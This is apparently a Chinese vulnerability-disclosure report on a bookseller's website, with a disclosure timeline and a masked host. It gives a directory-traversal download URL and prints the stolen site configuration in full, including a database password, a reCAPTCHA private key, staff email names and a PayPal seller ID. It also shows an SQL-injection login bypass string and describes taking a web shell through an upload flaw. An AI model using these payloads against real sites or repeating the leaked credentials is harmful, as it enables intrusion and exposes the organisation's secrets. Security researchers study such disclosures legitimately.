2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开
2016-02-27: 细节向公众公开
rt
目标:http://**.**.**.**
1. 任意文件下载(force_download.php 的 file 参数未限制目录穿越),构造如下:
http://**.**.**.**/force_download.php?file=../../force_download.php
同样的方式可下载站点配置文件:
http://**.**.**.**/force_download.php?file=../../_common/site_config.php
site_config.php 中的内容(包含数据库账号、SMTP 与 reCAPTCHA 密钥等敏感配置):
if(UAT){ define('DEBUG_MODE', false); //define('ADMIN_MAIL', "admin@**.**.**.**"); //define('ORDER_MAIL', "orders.sagebooks@**.**.**.**"); define('ADMIN_MAIL', "tim.20130401@**.**.**.**"); define('ORDER_MAIL', "tim.20130401@**.**.**.**"); define('MAIL_FROM', "admin@**.**.**.**"); define('MAIL_FROM_NAME', "Sage Sagebooks"); define("SMTP", "localhost"); define("SMTP_ID", ""); define("SMTP_PWD", ""); //Google Captcha http://**.**.**.** define('RECAPTCHA_KEY_PUBLIC', "6LcmdO0SAAAAABGlcjqrEDe58RJaGOJ6RJVbdFis"); define('RECAPTCHA_KEY_PRIVATE', "6LcmdO0SAAAAAEL9BvR8q_asz7OpIe-NeIK3VYfH"); //database define('DB_USER', 'sagefoun_sage'); define('DB_PWD', 'children2013'); define('DB_HOST', 'localhost'); define('DB_NAME', 'sagefoun_sage'); //directory define('SERVER_URL', "http://**.**.**.**"); define('SITE_ROOT', '/'); //paypal define('PAYPAL_SITE', "**.**.**.**"); define('PAYPAL_URL', "https://**.**.**.**/cgi-bin/webscr"); define('PAYPAL_SELLER', "seller_1296180842_biz@**.**.**.**"); }//LIVE ============================================================================== elseif(LIVE){ define('DEBUG_MODE', false); error_reporting(0); ini_set('display_errors', 0); //define('ORDER_TEST', true); define('ORDER_TEST', false); if(!ORDER_TEST){ define('ADMIN_MAIL', "orders.sagebooks@**.**.**.**"); define('ORDER_MAIL', "orders.sagebooks@**.**.**.**"); }else{ define('ADMIN_MAIL', "garlichsuen@**.**.**.**"); define('ORDER_MAIL', "garlichsuen@**.**.**.**"); } define('MAIL_FROM', "admin@**.**.**.**"); define('MAIL_FROM_NAME', "思展 Sagebooks"); define("SMTP", "localhost"); define("SMTP_ID", ""); define("SMTP_PWD", ""); //Google Captcha sage define('RECAPTCHA_KEY_PUBLIC', "6LcmdO0SAAAAABGlcjqrEDe58RJaGOJ6RJVbdFis"); define('RECAPTCHA_KEY_PRIVATE', "6LcmdO0SAAAAAEL9BvR8q_asz7OpIe-NeIK3VYfH"); //database //define('DB_USER', 'sagefoun_cms'); //define('DB_PWD', 'children1997'); //define('DB_HOST', 'localhost'); //define('DB_NAME', 'sagefoun_cms'); define('DB_USER', 'sagefoun_sage'); 
define('DB_PWD', 'children2013'); define('DB_HOST', 'localhost'); define('DB_NAME', 'sagefoun_sage');
2. 后台登录处存在 SQL 注入(万能密码绕过登录)
http://**.**.**.**/_sage_admin/index.php
在用户名处构造:
admin'or '1'='1
即可进入后台。
3. 进入后台后,利用编辑器的上传功能配合解析漏洞,拿下 shell。
..
危害等级:高
漏洞Rank:16
确认时间:2016-01-14 17:09
已將事件通知有關機構
暂无